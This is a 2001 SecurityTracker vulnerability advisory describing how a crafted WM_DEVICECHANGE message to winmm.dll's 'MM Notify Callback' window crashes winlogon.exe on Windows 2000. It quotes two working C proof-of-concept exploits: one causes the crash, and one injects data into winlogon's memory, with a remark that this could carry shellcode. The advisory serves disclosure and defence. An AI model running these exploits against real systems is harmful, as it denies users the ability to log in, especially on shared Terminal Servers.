SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   OS (Microsoft)  >   Windows DLL (Any) Vendors:   Microsoft
Windows 2000's WINMM.DLL Can Locally Crash WINLOGIN.EXE
SecurityTracker Alert ID:  1000940
SecurityTracker URL:  http://securitytracker.com/id/1000940
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 16 2001
Impact:   Denial of service via local system
Exploit Included:  Yes  

Description:   The "MM Notify Callback" message can apparently be used via winmm.dll to crash winlogon.exe. This must be performed locally.

It is reported that, similar to the recent "NetDDE Agent" window vulnerability, there is another vulnerable window hosted by winlogon.exe: "MM Notify Callback". It is hosted by winmm.dll which is loaded into winlogon.exe.


Impact:   Winlogon can be locally crashed, preventing future login attempts.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/current.asp (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (NT), Windows (2000)
Underlying OS Comments:  Windows 2000 and possibly Windows NT

Message History:   None.


 Source Message Contents

Subject:  More on Winlogon's "windows"


Quick info:
Type        : Local DoS
OS          : Windows 2000 (all variants) and probably Windows NT
Risk factor : Low


As well as recent "NetDDE Agent" window hosted by winlogon.exe, there is one another window:
"MM Notify Callback". It is hosted by winmm.dll which is loaded into winlogon.exe.

Windows procedure seems to handle few messages, WM_CREATE, WM_DESTROY, WM_CLOSE, WM_TIMER,
and, the most interesting, WM_DEVICECHANGE.

The primary role of WM_DEVICECHANGE message is informing the user-space environment about device plug/unplug  and related issues.

The "MM Notify Callback" window analyses only "MM Notify Callback"
DBT_DEVICEARRIVAL [0x8000] and
DBT_DEVICEREMOVECOMPLETE [0x8004] sub-messages (arriving from wParam).

When it gots this messages, it reads data structure, interpreting lParam as pointer.
Data structure must have value 0x00000005 at offset+0x4 and
must have special GUID value at offset+0xC,
and must have null-terminated uncode string ot offset+0x1C

This issue most probably cannot serve for executing code with SYSTEM priveleges,
but this requires more accurate research. Quick look at winmm.dll code  shows that supplied
structure doesn't used in copy operations into random memory addresses, however, you can
fill region of winlogon's memory with practically any user-suppied data (the only prohibited
value is unicode 0x0000 string terminator).

This can be used as shellcode for another winlogon's bug, for example.

Nevertheless, by running exploit from the bottom of message, you can crash winlogon.exe with access violation.

Thus have little value for ordinary Workstations and Servers, but can be used to DoS against Terminal Servers.

Exploit 1: crashes winlogon with access violation
Exploit 2: inject data string of 'ABCD' x 0x1000 (in unicode) into winlogon memory space

----- exploit 1-------
#include <windows.h>
#include <stdio.h>

DWORD exploit[]={0x11223344,0x5, 0x55667788,
  0x6994AD04,0x11D093EF,0xA000CCA3,0x963122C9
};

int main()
{
  HWND hwnd=FindWindow("MM Notify Callback","MM Notify Callback");
  printf("Window=%x\n",hwnd);
  SendMessage(hwnd, WM_DEVICECHANGE, 0x8000,0x00000000);
  // 							  ^^^^^^^^^^ AV address
  return 0;
}

----- exploit 2-------
#include <windows.h>
#include <stdio.h>

DWORD exploit[]={0x11223344,0x5, 0x55667788,
  0x6994AD04,0x11D093EF,0xA000CCA3,0x963122C9
};

int main()
{
  DWORD *ptr;
  DWORD i,j;
  HWND hwnd=FindWindow("MM Notify Callback","MM Notify Callback");
  printf("Window=%x\n",hwnd);
  ptr = (DWORD*)malloc(0x1000*4+sizeof(exploit));
  for(i=0;i<sizeof(exploit)/sizeof(exploit[0]);i++)
    ptr[i]=exploit[i];

  for(j=0;j<0x1000;j++) ptr[i+j]='ABCD';


  SendMessage(hwnd, WM_DEVICECHANGE, 0x8000,(DWORD)ptr);
  return 0;
}
-------------------------------------

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2017, SecurityGlobal.net LLC